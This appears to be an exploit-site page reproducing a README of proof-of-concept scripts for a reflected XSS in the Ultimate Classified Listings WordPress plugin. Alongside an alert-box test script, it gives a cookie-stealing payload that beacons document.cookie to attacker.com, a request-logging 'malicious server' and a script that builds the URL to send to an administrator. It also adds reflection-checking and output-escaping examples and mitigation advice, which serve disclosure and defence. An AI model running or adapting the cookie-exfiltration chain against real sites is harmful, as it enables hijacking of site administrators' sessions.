## https://sploitus.com/exploit?id=2ADBC468-C996-5226-B82E-32B28EC42B48
# Proof of Concept (PoC) for Vulnerabilities in WordPress Plugins
This repository contains Proof of Concept (PoC) scripts for various vulnerabilities discovered in different WordPress plugins. These scripts demonstrate how attackers can exploit these vulnerabilities to perform malicious actions.
## Table of Contents
- [Vulnerabilities Covered](#vulnerabilities-covered)
- [Setup and Usage](#setup-and-usage)
- [Reflected XSS in Ultimate Classified Listings Plugin](#reflected-xss-in-ultimate-classified-listings-plugin)
- [Stealing Cookies Using XSS](#stealing-cookies-using-xss)
- [Important Considerations](#important-considerations)
## Vulnerabilities Covered
1. **Reflected Cross-Site Scripting (XSS) in Ultimate Classified Listings Plugin**
- A vulnerability in the Ultimate Classified Listings WordPress plugin before version 1.4 allows attackers to execute arbitrary JavaScript in a victim's browser, because a request parameter is reflected into the page without being sanitized or escaped.
2. **Stealing Cookies Using XSS**
- Demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies of high-privilege users, such as admins, by sending the cookies to a malicious server.
## Setup and Usage
### Reflected XSS in Ultimate Classified Listings Plugin
This PoC demonstrates how to exploit the reflected XSS vulnerability in the Ultimate Classified Listings plugin.
1. **Identify the Vulnerable Parameter**:
- Assume the vulnerable parameter is `search` on the page `http://example.com/classifieds` (the exact parameter name and page path must be confirmed against the plugin's own pages on the target before testing).
2. **Craft a Malicious URL**:
- The malicious URL carries a payload that pops an alert dialog. The browser percent-encodes the angle brackets on the wire and the server decodes them before reflecting the value:
```plaintext
http://example.com/classifieds?search=<script>alert('XSS')</script>
```
3. **Run the PoC Script**:
- Save the following script as `xss_poc.py` and run it.
```python
import requests
from urllib.parse import urlencode

# Configuration
target_url = "http://example.com/classifieds"  # Change this to the target site's URL
payload = "<script>alert('XSS')</script>"      # XSS payload


def trigger_xss():
    # Construct the malicious URL; urlencode percent-encodes the payload the
    # same way a browser would when following the link
    malicious_url = f"{target_url}?{urlencode({'search': payload})}"
    # Send a GET request to the malicious URL
    response = requests.get(malicious_url, timeout=10)
    # A verbatim (unescaped) echo of the payload means the page did not
    # HTML-encode the parameter; an escaped echo (&lt;script&gt;) will not match
    if payload in response.text:
        print("[+] XSS payload reflected in the response.")
        print("[+] Malicious URL:", malicious_url)
    else:
        print("[-] XSS payload not reflected in the response.")


if __name__ == "__main__":
    trigger_xss()
```
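The script above treats any verbatim echo of the payload as a hit. When checking a candidate parameter by hand it helps to distinguish three outcomes: the payload comes back raw (exploitable reflection), it comes back HTML-encoded (the site escapes output, which is the fix), or it does not come back at all. The following is an added example, not code from this repository; the response bodies are constructed here to stand in for what a vulnerable and a patched page would return, and `build_test_url` shows the percent-encoded form of the URL from step 2.

```python
import html
from urllib.parse import urlencode

# Payload from the README
PAYLOAD = "<script>alert('XSS')</script>"

# Constructed sample responses (not captured from a real site)
VULNERABLE_BODY = (
    "<h2>Results for: <script>alert('XSS')</script></h2>"
    "<p>No listings matched your search.</p>"
)
PATCHED_BODY = (
    "<h2>Results for: &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;</h2>"
    "<p>No listings matched your search.</p>"
)
UNRELATED_BODY = "<h2>Classifieds</h2><p>Nothing here.</p>"


def build_test_url(base_url, param, payload):
    """Percent-encode the payload into the query string as a browser would."""
    return f"{base_url}?{urlencode({param: payload})}"


def classify_reflection(body, payload):
    """Return 'raw' if the payload appears unescaped in the body (the page
    reflects it into HTML verbatim), 'escaped' if it is present only after
    decoding HTML entities (the page escapes output), else 'absent'."""
    if payload in body:
        return "raw"
    # html.unescape turns &lt; &gt; &#x27; back into < > ' so an escaped echo
    # of the payload becomes recognisable
    if payload in html.unescape(body):
        return "escaped"
    return "absent"


if __name__ == "__main__":
    print(build_test_url("http://example.com/classifieds", "search", PAYLOAD))
    for name, body in (("vulnerable", VULNERABLE_BODY),
                       ("patched", PATCHED_BODY),
                       ("unrelated", UNRELATED_BODY)):
        print(f"{name:>10}: {classify_reflection(body, PAYLOAD)}")
```

A `raw` result is strong evidence but not proof of execution: the reflection may land in an HTML comment or a `<textarea>`, or a Content-Security-Policy header may block inline scripts, so confirm the alert in a browser before reporting.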
### Stealing Cookies Using XSS
This PoC demonstrates how an attacker can chain the reflected XSS to exfiltrate the cookies of a high-privilege user who opens the crafted link. Note that WordPress sets its own authentication cookies with the HttpOnly flag, so on a default install `document.cookie` will not contain them; the payload captures only the cookies that are readable from JavaScript.
1. **Setup a Malicious Server**:
- Save the following script as `malicious_server.py` and run it to start a server that logs incoming requests. The exfiltrated cookie arrives in the query string of the request path, so the path is logged along with the headers.
```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging


class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The stolen cookie is carried in the query string (e.g. /?cookie=...),
        # so log the request path; the headers only carry the victim's cookies
        # for *this* host, not the target site's
        logging.info(f"Received request: {self.path}")
        logging.info(f"Headers: {self.headers}")
        self.send_response(200)
        self.end_headers()


def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
    logging.basicConfig(filename='server.log', level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info(f'Starting server on port {port}...')
    httpd.serve_forever()


if __name__ == "__main__":
    run()
```
2. **Craft a Payload to Steal Cookies**:
- Create a payload that sends the victim's cookies to the malicious server. `encodeURIComponent` keeps the `;` and `=` characters of the cookie string intact inside the query parameter:
```plaintext
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080/?cookie='+encodeURIComponent(document.cookie);</script>
```
3. **Run the PoC Script**:
- Save the following script as `steal_cookies_poc.py` and run it. The script only verifies that the payload is reflected and prints the malicious URL; the exfiltration happens when a logged-in administrator opens that URL in a browser, at which point the beacon request (with the cookie in its query string) appears in `server.log`.
```python
import requests
from urllib.parse import urlencode

# Configuration
target_url = "http://example.com/classifieds"  # Change this to the target site's URL
attacker_server = "http://attacker.com:8080"   # Change this to your malicious server's URL
# encodeURIComponent keeps ';' and '=' in the cookie string intact in the query
payload = f"<script>new Image().src='{attacker_server}/?cookie='+encodeURIComponent(document.cookie);</script>"


def trigger_xss():
    # Construct the malicious URL with the payload percent-encoded
    malicious_url = f"{target_url}?{urlencode({'search': payload})}"
    # Send a GET request to the malicious URL
    response = requests.get(malicious_url, timeout=10)
    # A verbatim echo means the page is vulnerable; deliver malicious_url to
    # the victim to trigger the exfiltration
    if payload in response.text:
        print("[+] XSS payload reflected in the response.")
        print("[+] Malicious URL:", malicious_url)
    else:
        print("[-] XSS payload not reflected in the response.")


if __name__ == "__main__":
    trigger_xss()
```
## Important Considerations
- **Permissions**: Ensure you have explicit permission to test these vulnerabilities on the target site. Unauthorized access is illegal and unethical.
- **Testing Environment**: Perform these tests in a controlled environment to avoid impacting production systems.
- **Mitigation**: Update the Ultimate Classified Listings plugin to version 1.4 or later. In plugin code, escape user input at the point of output with the WordPress helper that matches the context (`esc_html()` for text, `esc_attr()` for attribute values, `esc_url()` for URLs); stripping angle brackets alone is not sufficient.
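The mitigation point deserves a concrete illustration: escaping has to match the HTML context the value lands in. The following is an added example, not plugin code (the plugin is PHP; here Python's `html.escape` stands in for WordPress's `esc_html()`/`esc_attr()`). It renders a search form the way an unpatched plugin might, then with a partial fix that only neutralises `<` and `>`, then with context-aware escaping, and uses Python's HTML parser to check which versions still leave an executable script or event handler. Both payloads are constructed here; the attribute-breakout payload is the standard `" onfocus=...` form.

```python
import html
from html.parser import HTMLParser

# Payload from the README, plus an attribute-breakout payload (constructed here)
SCRIPT_PAYLOAD = "<script>alert('XSS')</script>"
ATTR_PAYLOAD = '" autofocus onfocus=alert(1) x="'


def render_vulnerable(search):
    """Echo the search term straight into the page, as an unpatched plugin does."""
    return (
        f'<input type="text" name="search" value="{search}">'
        f"<h2>Results for: {search}</h2>"
    )


def render_partial_fix(search):
    """Neutralise only angle brackets. This stops <script> in the text node
    but not the attribute breakout: a double quote still ends the value."""
    cleaned = search.replace("<", "&lt;").replace(">", "&gt;")
    return (
        f'<input type="text" name="search" value="{cleaned}">'
        f"<h2>Results for: {cleaned}</h2>"
    )


def render_hardened(search):
    """Escape per context: quote=True also encodes the quote characters so the
    value cannot terminate the attribute (the esc_attr() role); plain escaping
    of < > & is enough for the text node (the esc_html() role)."""
    in_attr = html.escape(search, quote=True)
    in_text = html.escape(search, quote=False)
    return (
        f'<input type="text" name="search" value="{in_attr}">'
        f"<h2>Results for: {in_text}</h2>"
    )


class _Inspector(HTMLParser):
    """Collect the <input> element's attributes and count <script> elements."""

    def __init__(self):
        super().__init__()
        self.input_attrs = {}
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.input_attrs = dict(attrs)
        elif tag == "script":
            self.script_tags += 1


def analyze(page):
    """Parse the rendered page like a browser would and report whether it
    contains a real <script> element or an onfocus handler on the input."""
    p = _Inspector()
    p.feed(page)
    p.close()
    return {
        "script_tags": p.script_tags,
        "input_has_onfocus": "onfocus" in p.input_attrs,
    }


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("partial_fix", render_partial_fix),
                         ("hardened", render_hardened)):
        print(name, analyze(render(SCRIPT_PAYLOAD)), analyze(render(ATTR_PAYLOAD)))
```

The partial fix is the instructive case: the `<script>` payload is defused, yet the attribute payload still yields `<input ... value="" autofocus onfocus=alert(1) x="">`, which fires as soon as the page loads. Only the context-aware version leaves the parser with the payload confined to an attribute value and a text node.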
These PoCs demonstrate how an attacker could exploit vulnerabilities in WordPress plugins to perform malicious actions. Always keep your software up-to-date and follow security best practices to prevent such vulnerabilities.